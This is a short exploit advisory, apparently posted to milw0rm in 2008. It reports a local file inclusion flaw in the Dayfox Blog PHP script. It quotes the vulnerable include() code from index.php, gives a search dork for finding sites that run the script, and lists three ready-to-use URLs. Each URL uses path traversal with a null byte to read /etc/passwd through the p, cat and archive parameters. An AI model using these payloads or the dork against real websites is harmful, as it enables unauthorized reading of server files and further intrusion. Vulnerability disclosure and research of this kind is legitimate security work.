########################################################################
# #
# ..:::::Dayfox Blog LOCAL FILE INCLUSION Vulnerbility ::::... #
########################################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By :Virangar Security Team (hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra
& all virangar members & all iranian hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from ISCN
-----------------------------------
Download: http://www.dayfoxdesigns.co.nr
Dork:Powered by Dayfox Designs This is a port of WordPress
-------------------------------------------------------------------------------------------------
vuln codes in index.php:
############line 140-144##################
if (isset($_GET["cat"])) {
$page = 'entries/'.strip_tags(htmlspecialchars($_GET["cat"])).'.txt';
if (file_exists($page)) {
echo "
< Back";
@include ("$page");
############line 173-178###################
if (isset($_GET["p"])) {
$page = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'.txt';
$pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET["p"])).'comments.txt';
if (file_exists($page)) {
echo '
< Back';
include ("$page");
############line 209-213##################
if (isset($_GET["archive"])) {
$page = 'entries/'.strip_tags(htmlspecialchars($_GET["archive"])).'.txt';
if (file_exists($page)) {
echo '
< Back';
include ("$page");
----------------------------------------------------------------------------------------------------
exploit:
http://site.com/index.php?p=../../../../../../../etc/passwd%00
http://site.com/index.php?cat=../../../../../../../etc/passwd%00
http://site.com/index.php?archive=../../../../../../../etc/passwd%00
--------
young iranian h4ck3rz
# milw0rm.com [2008-08-04]